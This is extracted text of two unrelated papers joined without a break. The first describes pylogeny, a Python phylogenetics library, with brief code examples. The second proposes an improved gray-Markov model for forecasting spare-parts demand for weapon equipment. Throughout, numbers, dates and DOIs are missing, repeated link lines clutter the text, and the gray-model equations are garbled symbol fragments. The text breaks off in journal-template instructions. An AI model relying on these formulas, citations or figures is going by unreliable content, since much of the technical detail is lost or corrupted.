http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://pypi.python.org/pypi/pylogeny http://dx.doi.org/ . /peerj-cs. where nodes represent tree solutions and edges represent rearrangement between two trees according to a given operator. operators include nearest neighbor interchange (nni), subtree prune and regraft (spr), and tree bisection and reconnection (tbr), most of which are implemented presently in pylogeny (felsenstein, ). these nodes can be evaluated for fitness against sequence data. we can also evaluate properties of the space such as location of local and global maxima, and the quantity of the latter. the presence of multiple maxima is a confounding factor in heuristic searches which may lead to drawing incorrect conclusions on evolutionary histories. the source code and library requires only a small number of dependencies. python dependencies include numpy (walt, colbert & varoquaux, ), a ubiquitous numerical library, networkx (hagberg, schult & swart, ), a graph and network library, pandas (mckinney, ), a high-performance library for numerical data, and p (foster, ), a phylogenetic library. an additional dependency that is required is a c phylogenetic library called libpll that underlies the raxml application and is used to score likelihood of trees (stamatakis, ; flouri et al., ). optionally, the beagle (ayres et al., ) package could be used for scoring as well. most dependencies are automatically resolved by a single command by installing the package from the pypi package index. primary documentation is available on the library’s website and alongside the library. all major classes and methods also possess documentation that can be accessed using a native command. features the functionality to maintain a phylogenetic landscape is implemented in the landscape class defined in the landscape module of this library. this object interacts with a large number of other classes and supports tree scoring using standard phylogenetic methods. many of the more relevant objects are tabulated and explained in table . a large coverage of unit testing has been performed on most of the major features including tree rearrangement, heuristic exploration, and landscape construction. the pylogeny library can read sequence alignments and character data in formats including fasta, nexus, and phylip. tree data can only currently be read in a single format with future implementations to allow for a greater breadth of formats. persistence and management of character data is performed by an alignment module, while trees are stored by their representative string in a tree module. they can be instantiated into a richer topology object in order to manipulate and rearrange them. phylogenetic tree manipulation and scoring for the purposes of this framework, if instantiated into a topology object, phylogenetic trees are modelled in memory as rooted. therefore, manipulation and access of the tree components, such as nodes and edges, presupposes a rooted structure. unrooted trees, either multifurcating or bifurcating, can nevertheless still be output and read. support is also present for splits or bipartitions (as in the bipartition object) of these trees, required by many phylogenetic applications such as consensus tree generation (margush & mcmorris, ). safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table overview of the basic objects in the pylogeny library. class name module name description alignment alignment represents a biological sequence alignment of character data to enable phylogenetic inference and other operations. treebranch base represents a branch in a tree structure, such as a phylogenetic tree, and its associated information. treenode base represents a node in a tree structure, such as a phylogenetic tree, and its associated information. treestructure base a collection of treenode and treebranch objects to comprise a tree structure. executable executable an interface for the instantation and running of a single call of some given binary application (in a unix shell). heuristic heuristic an interface for a heuristic that explores a state graph and all associated metadata. graph landscape represents a state graph. landscape landscape represents a phylogenetic tree search space, modelled as a graph. vertex landscape represents a single node in the phylogenetic landscape, associated with a tree, and adds conve- nient functionality to alias parent landscape functionality. landscapewriter landscapewriter allows one to write a landscape object to a file, including alignment and tree information. landscapeparser landscapewriter allows one to parse a landscape that was written to a file. newickparser newick allows one to parse a newick or new hampshire format string of characters representing a (phylogenetic) tree. rearrangement rearrangement represents a movement of a branch or node on one tree to another part of that same tree. topology rearrangement an immutable representation of a phylogenetic tree where movements can be performed to construct new topology or tree objects. bipartition tree represents a bipartition of a phylogenetic tree. a branch in a phylogenetic tree defines a single bipartition that divides the tree into two disjoint sets of leaves. tree tree represents a phylogenetic tree which does not contain structural information and only defines features such as its newick string, fitness score, and origin. treeset tree represents an ordered, disorganized collection of trees that do not necessarily comprise a combinatorial space. iterators can be created for visiting different elements in a tree. unrooting, rerooting, and other simple manipulation can also be performed on a tree. for more complex manipulation, rearrangement operators (using the rearrangement module) can be performed on a tree to convert it to another topology. to save memory and computation, rearrangements are not performed unless the resultant structure is requested, storing movement information in a transient intermediate structure. this avoids large-scale instantiations of new topology objects when exploring the search space. scoring topologies using parsimony or likelihood is done by calling functions present in the library that wrap libpll or the high-performance beagle library. these software packages are written in c or c++, the latter of which allows for increased performance by using the graphics processing unit (gpu) found in a computer for processing. tree search space graph construction and search the tree search space is abstracted as a graph where a number of graph algorithms and analyses can be performed on it. we do this by utilizing routines found in the networkx library which has an efficient implementation of the graph in c. accessing elements of the graph can be done by iteration or by node name, and properties of the space can be identified by function. safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. exploring the space is done by performing rearrangements on trees as topology objects where different methods of exploration include a range of enumeration and stochastic-based sampling approaches. in order to make newick strings consistent amongst trees in a phylogenetic tree search space, an arbitrary but efficient rooting strategy is used to avoid redundancy. rearranging trees in the search space reroots resultant trees to the lexicographically lowest-order taxa name. this means that different rearrangements that lead to the same topology, with a possibly different ordering of leaves, can still be recognized as not being a new addition to the space. restriction on this exploration is supported by allowing limitations on movement by disallowing breaking certain bipartitions. a minimal example to demonstrate constructing a landscape from an alignment file, and finding trees in the space, is found below. the landscape is initialized with a single tree corresponding to an approximate maximum likelihood tree as determined using the fasttree executable (price, dehal & arkin, ). from pylogeny.alignment import * from pylogeny.landscape import landscape # open an alignment compatible with the strict # phylip format. ali = phylipfriendlyalignment(’al.fasta’) starttree = ali.getapproxmltree() # create the landscape with a root tree. lscape = landscape(ali,starting_tree=starttree, root=true) # explore around that tree. trees = lscape.exploretree(lscape.getroot()) the variable trees now holds a list of integers. these integers correspond to the names of new trees that have populated our landscape object. these new trees comprise the neighbors of the starting tree, a tree found using fasttree. one could now query the landscape object for new information such as listing these neighbors or writing all of the newick strings of these trees. # see trees around the starting tree. for i in trees: # iterate over these. # print their newick strings. print lscape.gettree(i) applying search space heuristics performing a heuristic search of the combinatorial space comprised by a phylogenetic landscape can be done with relative ease using this library. not only can the heuristic’s safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. steps be later analysed, the resulting space that is explored can also be later viewed and investigated for its properties. the heuristic module has a number of already defined approximate methods to discover the global maximum of the space, and with understanding of the object hierarchy, one can create their own. as an example, one could perform a greedy hill-climbing heuristic on the search space by comparing the trees’ parsimony scores. to do this, they would instantiate a parsimonygreedy object from the heuristic module and provide an existing landscape and tree in that landscape to initiate the climb. the minimal code to achieve a search from the initial tree would be: from pylogeny.alignment import alignment from pylogeny.landscape import landscape from pylogeny.heuristic import parsimonygreedy # ali = open an alignment file. # lscape = construct a landscape. # ... h = parsimonygreedy(lscape,lscape.getrootnode()) h.explore() we have applied a heuristic to the landscape which has populated it with new trees. nothing is returned here. in order to investigate what new trees have been added, we can query the heuristic object. furthermore, we can access these new trees from the landscape object. newtrees = h.getpath() # list of tree names. for name in newtrees: # visit all trees found by heuristic. tree = lscape.gettree(name) print tree.getscore() # print scores. existing phylogenetic and heuristic programs the library supports executing other software on its objects. implementations are present in the framework to call on the fasttree (price, dehal & arkin, ) and raxml heuristics for finding an approximate maximum likelihood tree. there is also an implementation for the use of treepuzzle (schmidt et al., ) and consel (shimodaira & hasegawa, ) in order to acquire confidence interval of trees as defined by the approximately unbiased (au) test (shimodaira, ). further implementations can be created by extending a base interface found in the library. an example of code to demonstrate the use of consel, to generate a confidence interval of trees with default settings, is as follows. safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. from pylogeny.alignment import alignment from pylogeny.executable import consel # ali = open an alignment file. # trees = a set of trees (e.g., a landscape). # ... autest = consel(trees,ali,’autestname’) interval = autest.getinterval() we now have a treeset, or collection, of tree objects assigned to the variable interval which have been deemed to be significant and relevant. other libraries other python libraries that perform similar tasks to this framework include dendropy (sukumaran & holder, ), ete, and the p phylogenetic library. elements of alignment management and tree manipulation are present in all three of these libraries, but none of them allow for the manipulation and heuristic search of a combinatorial space of phylogenetic trees. there remains a deficiency for this functionality across many languages, python included. despite this, this framework can serve to work alongside such libraries for further power. dendropy possesses a number of metrics and other tree operations that are not present in pylogeny. this library supports translating its tree structure to the structure found in dendropy. therefore, these operations can still be accessed. similarly, ete allows for a number of rich visualization techniques not possible with this framework that can also be accessed in such a manner. a small part of the pylogeny library is built on the p phylogenetic library and the p library performs a number of operations that are found in this framework, such as scoring and manipulation of trees. we, however, did not find p as flexible an api as it appears to be designed for scripting and for work in a terminal rather than as a component of a larger application. for example, p likelihood calculations are printed to the standard output rather than returned from a function. acknowledgements the authors thank professor r. beiko and the members of dr. beiko’s lab in dalhousie university for some helpful suggestions. the members of the blouin lab are also acknowledged for helpful comments and critical review of this manuscript. additional information and declarations funding this work was supported by nserc discovery grant no. . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: nserc discovery: . competing interests the authors declare there are no competing interests. author contributions • alexander safatli performed the experiments, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • christian blouin reviewed drafts of the paper, provided advice and supervision. data deposition the following information was supplied regarding the deposition of related data: github: https://github.com/alexsafatli/pylogeny. references ayres dl, darling a, zwickl dj, beerli p, holder mt, lewis po, huelsenbeck jp, ronquist f, swofford dl, cummings mp, rambaut a, suchard ma. . beagle: an application programming interface and high-performance computing library for statistical phylogenetics. systematic biology ( ): – doi . /sysbio/syr . felsenstein j. . inferring phylogenies. vol. . sunderland: sinauer associates. flouri t, izquierdo-carrasco f, darriba d, aberer a, nguyen l-t, minh b, von haeseler a, stamatakis a. . the phylogenetic likelihood library. systematic biology doi . /sysbio/syu . foster pg. . modeling compositional heterogeneity. systematic biology ( ): – doi . / . hagberg aa, schult da, swart pj. . exploring network structure, dynamics, and function using networkx. in: proceedings of the th python in science conference (scipy ), pasadena, ca, usa, – . margush t, mcmorris fr. . consensus n-trees. bulletin of mathematical biology ( ): – . mckinney w. . data structures for statistical computing in python. in: van der walt s, millman j, eds. proceedings of the th python in science conference. – . price mn, dehal ps, arkin ap. . fasttree –approximately maximum-likelihood trees for large alignments. plos one ( ):e doi . /journal.pone. . schmidt ha, strimmer k, vingron m, von haeseler a. . tree-puzzle: maximum likelihood phylogenetic analysis using quartets and parallel computing. bioinformatics ( ): – doi . /bioinformatics/ . . . shimodaira h. . an approximately unbiased test of phylogenetic tree selection. systematic biology ( ): – doi . / . shimodaira h, hasegawa m. . consel: for assessing the confidence of phylogenetic tree selection. bioinformatics ( ): – doi . /bioinformatics/ . . . safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny https://github.com/alexsafatli/pylogeny http://dx.doi.org/ . /sysbio/syr http://dx.doi.org/ . /sysbio/syu http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . / http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /peerj-cs. stamatakis a. . raxml version : a tool for phylogenetic analysis and post-analysis of large phylogenies. bioinformatics doi . /bioinformatics/btu . sukumaran j, holder mt. . dendropy: a python library for phylogenetic computing. bioinformatics ( ): – doi . /bioinformatics/btq . walt svd, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science & engineering ( ): – doi . /mcse. . . safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /peerj-cs. pylogeny: an open-source python framework for phylogenetic tree reconstruction and search space heuristics introduction features phylogenetic tree manipulation and scoring tree search space graph construction and search applying search space heuristics existing phylogenetic and heuristic programs other libraries acknowledgements references paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - demand forecast of weapon equipment spare parts based on improved gray-markov model li ou school of computer science and engineering xi’an technological university xi’an, china e-mail: @ .com liu bailin school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com li chenhao school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com gao dan school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract—the demand for spare parts of weapons and equipment is time-varying and random. it is difficult to predict the demand for spare parts. therefore, on the basis of gray gm( , ), a state transition probability matrix based on improved state division is used to establish a demand forecast model for weapon equipment and spare parts. the model not only considers the characteristics of the gm( , ) model's strong handling of monotonic sequences, but also extracts the characteristics of random fluctuation response of data through the transformation of the state transition probability matrix, avoiding the phenomenon of the worst prediction results when the maximum probability state is not the actual state. it is proved through experiments that the prediction result based on the improved gray-markov model is superior to the traditional model and the classic gray-markov prediction model, and the accuracy of the improved model is about . times higher than that of the gray model. keywords-grey theory; markov model; spare parts forecast i. introduction weaponry is composed of many parts, and these parts need to be repaired and replaced during use. in order to shorten the short interval between the repairs of weaponry and equipment, increase normal working hours, reserve a reasonable number of spare parts for replacement at any time. weaponry spare parts are effective measures to improve the availability of weaponry and equipment, reduce life cycle costs, and ensure the effectiveness of combat effectiveness on time [ ]. in the issue of spare parts support, the prediction of spare parts demand is an important means to promote "precision support", and is also one of the key and difficult points in the research of equipment comprehensive support. there are many reasons for the occurrence of spare parts demand. in addition to the reliability rules of weapons and equipment itself, the use of equipment, repair strategies and maintenance methods will affect the number and time of spare parts demand. spare parts demand shows randomness and fluctuation therefore, equipment managers urgently need to find a method to predict the random demand for repair spare parts. at present, there are many technologies for demand planning, forecasting and decision-making, mainly including time series forecasting models, regression analysis methods, support vector machines, neural networks, gray forecasting and decision making, markov forecasting, combined optimization decision- making, and their between each other. among them, the method based on the time series prediction model requires a large amount of historical data, and the data must not have periodic changes or mutations. neural network-based spare parts demand prediction method requires a large number of statistical samples, and the international journal of advanced network, monitoring and controls volume , no. , prediction results are highly subjective and random. these factors greatly limit the application of artificial intelligence methods [ ]. therefore, how to improve the prediction accuracy of the demand for spare parts for weapons and equipment is an important link for effectively guaranteeing the supply of spare parts for our military equipment. the gray prediction model is suitable for solving the problems of small samples, poor information and uncertainty. it has less calculation and is convenient and practical. it has a good prediction effect for short- term prediction, but it has a poor fit for long-term prediction and volatile data series. the markov theory describes the influence of random factors and the internal laws of transition between states through the state transition probability, which can effectively make up for the deficiencies of the gray model [ ]. to this end, this paper proposes to predict the demand for spare parts for weapons and equipment based on an improved gray markov model, in order to effectively improve the prediction accuracy of random volatility data and broaden the application range of gray theory. ii. research status of spare parts demand management with the development and progress of economic globalization and science and technology, people have higher requirements for product quality and production efficiency, and there are more and more complex equipment in industrial production. in the process of using complex equipment, failures will inevitably occur due to factors such as maintenance damage, wear, corrosion, and expiration of life. in order to restore the normal operation of the equipment in time, minimize the economic loss caused by equipment failure or shutdown. [ ] companies generally purchase and store a certain number of accessories in advance, which are called spare parts. spare parts, as support materials for the daily maintenance and emergency handling of equipment, are an important factor in ensuring the normal operation of complex equipment. accurate and timely spare parts supply can ensure the continuity of production operations of the enterprise. spare parts are an important material basis for equipment support work. spare parts management work has become an important part of equipment support work. spare parts planning is affected by spare parts demand, so an effective spare parts demand forecasting model will provide an important basis for spare parts management decision making, and it is also the basis for quickly responding to changes in customer needs and improving corporate service levels. the demand for spare parts is very special. in most cases, the demand for spare parts occurs in uncertain and irregular time intervals, and the quantity is also unstable and changeable. strictly speaking, demand is usually divided into: slow-moving spare parts, intermittent demand spare parts. the consumption of spare parts is extremely special. some spare parts consume a large amount, while some spare parts consume a small amount, and have not even been consumed in a few years. this greatly increases the difficulty of accurately predicting the consumption of spare parts. in fact, in addition to conventional methods for forecasting spare parts, it is more important to study forecasting methods for uncertain or intermittent demand. spare parts demand forecasting is a very important part of equipment management, and it is the basis of inventory management. accurately planning the supply of spare parts can reduce the huge budget spent on spare parts, supply the required spare parts in time, improve the availability of equipment and the completeness of weapons and equipment, ensure that the equipment can complete production tasks and normal operations on time, and guarantee weapons and equipment in military exercises and battles, fighters will not be missed. on the other hand, accurate demand forecasting will have a very important impact on the formulation of spare parts inventory strategies and the construction of inventory models [ ]. in many complex equipment companies, spare parts inventory management has not attracted enough attention. in general: on the one hand, there are generally backward spare parts inventory management methods, improper inventory management methods, difficult spare parts search, and excessive backlog of a large number of unimportant spare parts, resulting in high inventory costs of enterprises; on the other hand, some spare parts inventory will not be able to meet equipment maintenance or customer demand changes. the shortage of key spare parts may cause equipment delays in maintenance or even shutdown accidents occasionally. inventory issues increasingly become a bottleneck restricting the survival and development of complex equipment companies. for companies, the most important issue is how to use inventory management strategy and inventory management system optimization to greatly reduce the amount of inventory funds occupied by spare parts, and then increase capital turnover and corporate economic benefits. international journal of advanced network, monitoring and controls volume , no. , iii. theoretical overview of grey system and markov chain a. basic concepts of gray system the naming of the gray system is different from the naming methods of other systems, it is named according to the degree of mastery of the information. the completely unknown information is represented by "black", this system is called the black system, and the information that is clearly grasped is represented by "white", this system is called the white system. according to this law, it is clear that "gray" is in the middle ground, and our grasp of this part of information is in a state of "ambiguity". this system is called the gray system. the most widely used grey system in the field of forecasting is the gm( , ) model. due to its small sample data, simple calculation and other advantages, it has been widely used in various fields such as society, economy, ecology, agriculture, etc., especially in the case of small samples, poor information and uncertain systems and lack of data, it has also been successful. application, which determines that the gm( , ) model in the gray system occupies an important position in the fields of prediction and decision-making. in order to expand the scope of application and prediction accuracy of the gm( , ) model, many scholars have done a lot of theoretical research. these studies mainly focus on: processing the original data, constructing the background value in the gm( , ) model, discussing the method of determining the initial value in the gm( , ) model, combining the gray system theory and other theoretical models combine. among them, there are two types of concepts in optimized combination forecasting. one is a forecasting method that selects appropriate weights for the weighted average of the forecast results obtained from several forecasting methods. the key is to determine the weighting coefficient of each individual forecasting method. compare in several prediction methods, choose the prediction model with the best fit or the smallest standard deviation as the best model for prediction. combination forecasting is to play its role when a single forecasting model cannot completely describe the changing law of the forecast. b. basic principles of the gray system using the information currently available to explore and predict unknown information is the most important theory of the gray system, which is the process from "grey" to "white" until the research purpose is achieved. the basic principles of the gray system are: ) principle of difference information "difference" is information, and all information must be different. saying "thing a is different from thing b" means that a has special information that b does not, which is the so-called difference. the basic way people understand the world is to observe the differences of different things in the objective world. ) the principle of non-uniqueness of solution when the information is not fully grasped, the solution obtained for it is uncertain and non-unique. this is caused by the incompleteness of the gray system information and cannot be avoided. ) principle of least information how to use the least information that has been mastered to maximize the effect is an important feature of the gray system to study unknown information. ) cognitive basis principle information is the basis of cognition. all cognition must be based on the information you have. ) new information priority principle the new information has priority in cognition, and its use value is greater than the old information. ) the principle of immortality incomplete information and uncertainty are universal. information is completely relative and temporary. the completeness of information is specific to a specific environment, and the objective environment is constantly changing, which will also be accompanied by the emergence of new uncertainties. c. grey prediction model the gray prediction model uses gm ( , ) modeling on the known information to find the simulated value, and then predicts the unknown information. this determines the change range of the gray forecast object, and its range must be bounded and related to time. as the core model of grey prediction, gm( , ) model is widely used in practical research. the establishment of the model is based on the data in the time series. through this model, the law of data change is analyzed, and the internal relationship is analyzed from the external relationship of various factors to find the hidden law, thereby generating the corresponding data sequence, and performing differential equation modeling. forecast the development trend of things. predicting the gray system is to mine and discover the development laws of the system by processing the international journal of advanced network, monitoring and controls volume , no. , original data and establishing the gray model, so as to predict the future state of the system. since the gray system contains both known information and unknown information, its prediction is the prediction of the gray process that is related to time and changes in a certain direction. although the laws shown by some gray processes are random and disorderly, their essence is bounded, orderly, and potentially regular. there are four main types of gray system forecasts: a) sequence prediction: refers to the prediction of the behavior of the system variables in the future. after the qualitative analysis of the data series, the appropriate sequence operator is selected, and the gray model is established based on the number sequence after the operation of the operator. the accuracy of the model it can be used to predict after inspection. b) catastrophe prediction: refers to the prediction of the abnormal value of the gray system, that is, the prediction of the time when a given gray number occurs, so as to provide guidance for the work of relevant departments. c) system prediction: refers to the prediction of multiple variables in the system together, which is mainly used to predict the relationship between system variables and reveal the development and changes of the system. d) topological prediction: also called waveform prediction. when the original data fluctuates greatly, the gray model is used to predict the waveform of future behavior data. d. markov process markov process has great significance in stochastic process and is widely used in biology, physics and other sciences. the definition of markov chain was first proposed in the early nineteenth century, and then people began to study and explore a random process with no aftereffect. ineffectiveness means that the state of the future is only related to the present and not related to the past. markov has made great contributions to probability theory, number theory, and differential equations[ ]. during - , he proposed and studied markov chains. his research results are of great help to probability theory. the random process he studied is called markov process. markov processes are continuous or discrete according to their state and time parameters, and are divided into three categories ) time and state are both discrete markov processes, called markov chains. ) the markov process with continuous time and discrete state is called continuous-time markov chain. ) time and state are continuous, which is called markov process. the research object of markov model is mainly the state of the system and the transition between states. the main purpose of establishing markov model for calculation analysis is to predict the possible state of variables in the future by analyzing the current state and change trend of system variables, and then provide corresponding theoretical basis for decision-making. the steps of using markov process to predict include: step reasonably divide the state. when the sample has less data, the number of states should be as small as possible, so that each state contains more data, which can more objectively reflect the transfer law between each state; step calculate the transition probability between each state in the markov process of the system, and determine the corresponding state transition matrix; step according to the initial state of the system and the transition probability matrix to predict the state in the future. iv. improved gray markov model a. gray model grey system theory was first proposed by our famous scholar professor deng julong in . it is a theory of gray system modeling, prediction, analysis, control and decision-making. grey prediction method is a new type of nonlinear prediction technology in the late s, which is a method system based on sequence operators and gray sequence production. the gray prediction model uses accumulation, accumulation or step ratio generation techniques, and uses differential fitting to directly convert the time series into a first-order univariate constant coefficient differential equation. according to the principle of continuity of prediction, the gray theory can be used to get more accurate prediction results [ ]. for data with relatively short data series, less information, and less regularity, data that meets the characteristics of poor information systems, the gray model can show superiority and advanced. the gray model is usually divided into a first-order single-variable model and a first-order combined model. the model is used in this paper. international journal of advanced network, monitoring and controls volume , no. , ) the original data sequence required for the design of spare parts for weapons and equipment is: )}(,), (), ({ ) () () () ( nxxxx  ( ) among them: 。nkkx ,, , , )() (  ) accumulate the original sequence once:  )(,), (), ( ) () () () ( nxxxx  ( ) among them: ), , )(()( ) () ( nkixkx k i    ) generate a sequence of immediate means:  )(,), (), ( ) () () () ( nzzzz  ( ) among them:  ) ()( )( ) () () (  kxkxkz ) establish model whitening equation: baz dx dz  ) ( ) ( ( ) among them:a and b are undetermined parameters. ) the gray equation of the model is: bkazkx  )()( ) () ( ( ) ) the corresponding time response equation is: a b e a b xkx at         ) () ( ) () ( ( ) ) the least square estimates of parameters a and b are:   ybbb b a a tt         ( )                   )( ) ( ) ( ) ( ) ( ) ( nz z z b                 )( ) ( ) ( ) ( ) ( ) ( nx x x y  ) reducing the prediction results to the prediction sequence: )() () ( ) () () ( kxkxkx   ( ) among them: ,, ,  nk  it can be seen from the above that the model predicts the original sequence after one accumulation. because the one-time accumulation sequence is monotonic, the model is suitable for predicting the data of the exponential change law, and the prediction error is large for random volatility data. the gm( , ) forecasting model occupies an important position in the grey system theory. the starting point of the model research is to explore valuable information in its own time series and explore the law of the research content without considering the impact of the research content. the gray system prediction model takes a small amount of data information as the research object. its research characteristics are simple calculation, simple principle and high prediction accuracy. the model has good prediction accuracy for modeling small amounts of information, but the prediction accuracy for irregularly changed and fluctuating data will be greatly reduced, so the gray prediction model does not have high prediction results for any data. the markov chain prediction model is different from the gray system model. it makes up for the shortcomings of the gray prediction model and can study data with large volatility. its model requires the prediction object to have markov properties. in this chapter, the two models are reasonably combined to form a gray markov prediction model. the gm( , ) model is used to characterize the trend of the original data sequence, and the markov prediction model is applied to the simulated data obtained by the gm( , ) model. the length of the ruler is selected and the shortness of the inch is compensated to improve the accuracy. b. grey markov model according to the gray system theory, the gray mean model and the markov model are fused, and the gray markov model is used to predict the demand for international journal of advanced network, monitoring and controls volume , no. , weapon equipment and spare parts. specifically, the gray mean model is used to predict the future demand for weapon equipment and spare parts [ ]. the state transition matrix determines the possible state of future spare parts, and finally corrects the prediction result based on the ratio between the predicted value and the actual value, so as to realize accurate prediction of weapon equipment spare parts. after determining the state division and state transition matrix, the general gray markov model uses the maximum value of the current transition probability as the next transition value [ ]~[ ]. this method ignores the possibility of other transition probabilities and based on the last state. for prediction, it is easy to be affected by randomness, which makes the prediction accuracy low, so the gray markov model is improved. the modeling idea of the gray-markov combination model is to first establish a gray prediction model to obtain a prediction sequence, and then use the relative difference sequence of the prediction sequence and the actual sequence to divide the state space, find the interval of the predicted value, and follow the prediction [ ]. the interval modifies the results of the model prediction, increases the credibility of the prediction, calculates the transition probability matrix from the point where the original data sequence falls into each state, and estimates the future change trend based on the state transition probability matrix. calculate the state transition probability matrix and obtain the predicted value according to the gray model ), , )(( ) ( nkkx   .using the curve as a reference, it is divided into several bar regions parallel to the trend curve, and each region constitutes a state. in this way, a non-stationary random sequence that matches the characteristic points of the markov chain is divided into n states. any state is  iii , ( ) among them: ii akx   )( ) ( , ii bkx   )( ) ( the state transition probability is: ni m m kp i kij ij , , ,)( )(  ( ) in the formula: )(km ij is the number of original data that state i  transfers to state l after j  steps; i m is the number of original data in state i  . the specific steps based on the improved gray markov prediction model are: step : according to the original data )(kx , find the coefficient a、b in the gray model, and get the fitting value )( ^ kx corresponding to the actual data. step : the range of the relative residual value sequence is obtained from the relative residual value formula. step : according to the actual situation, use the residual formula to divide the relative residual value range into states: l  , 、 step : based on the improved markov chain state transition probability determination method, the one- step state transition probability matrix is calculated:                  llll l l ppp ppp ppp p     ( ) among them: ,    l j ijij pp suppose a prediction system has  、、、 four states, the last data in actual data )(kx is in state  , then the initial distribution is ) ( ) ( i , and the predicted value of the next data is pii  ) () ( , based on which the state interval in which the predicted data is located can be obtained. the gray markov model is a model that combines the gray model and the markov model. its prediction process is: firstly generate gray according to the original data sequence, determine the parameters of the gray model according to the generated sequence; then use the established gray model carry out simulation prediction, test the accuracy of the established model according to the predicted value and actual value; then appropriately divide the gray prediction result into international journal of advanced network, monitoring and controls volume , no. , several states, establish a markov model, and predict and modify the state of the gray prediction result. according to the combination of gray model and markov model, traditional gray markov model prediction methods mainly include the following two: use the markov process to predict the sign of the gray prediction result residual model. after processing the given time series, a gray model is established, and the residual data series can be obtained by comparing the predicted result of the gray model with the actual value. the absolute value of the residual data sequence is used as the original data, and the gray prediction is performed to obtain the gray residual model. in order to improve the prediction accuracy, the markov process is used to predict the sign of the residual model at the future time. use markov process to predict the relative error of gray prediction results. establish a gray model based on the original data series, divide the state of the relative error of the gray prediction result, and predict the state of the relative error of the gray prediction result at the future time according to the current state transition, thereby improving the accuracy of the gray prediction result sex. the essence of the first combination forecasting method is to correct the gray residual model to improve the accuracy of the forecast; the essence of the second combination forecasting method is to directly correct the gray forecast results, so it is better than the first combination forecasting method. the calculation process is simple. when the markov process is used to predict the relative error of the gray results, there are two ways: one is to directly predict the state of the system in the future based on the initial state of the system and the n- step state transition matrix; the other is it is based on the initial state of the system and the one-step state transition matrix to predict the state of the next moment, and then based on the state of the next moment and the one-step state transition matrix to predict the state of the system at a later time. the advantage of the first method is that when predicting the state of the system at any time, the initial state used is known and accurate, and the various states of the system at a certain time are considered, and the probability of overestimation and underestimation is small; the disadvantage is: when predicting the state of the system at a distant time, a multi-step state transition matrix is needed. the calculation process of the multi-step state transition matrix is more complicated, and when the number of steps is large the accuracy of the corresponding matrix cannot be guaranteed. the advantage of the second method is that only one step of the state transition matrix is required for markov prediction, the calculation process is simple, and when the predicted state is accurate, the prediction result is very ideal; the disadvantage is: when the state of the system at a certain moment when the forecast is inaccurate, the forecast result will have a big deviation, and it will affect the forecast accuracy at subsequent moments. in the following articles, the model corresponding to the first calculation method is called the first gray markov model, and the model corresponding to the second calculation method is called the second gray markov model. the improved gray markov model is a reasonable combination of the first and second gray markov models, that is, two calculation methods are used to predict the corresponding values of the system parameters at the future time, and then the two results are calculated. calculate the average value. the improved gray markov model is optimized for markov process prediction, so the gray modeling part and the gm( , ) model is consistent, but the difference is the correction effect of the markov process on the gray prediction results. the specific steps for the establishment of the improved gray markov model mainly include: firstly generate gray for the prediction sequence, obtain the parameters of the gray model according to the generated data sequence, determine the gray model and make predictions; then divide the relative error of the gray prediction results state, determine the state transition of the markov process; then according to the calculation method of the first gray markov model and the second gray markov model to obtain the corresponding correction value of the gray prediction result, so as to obtain the improved gray the predicted value of the markov model. v. case analysis finally, complete content and organizational editing before formatting. please take note of the following items when proofreading spelling and 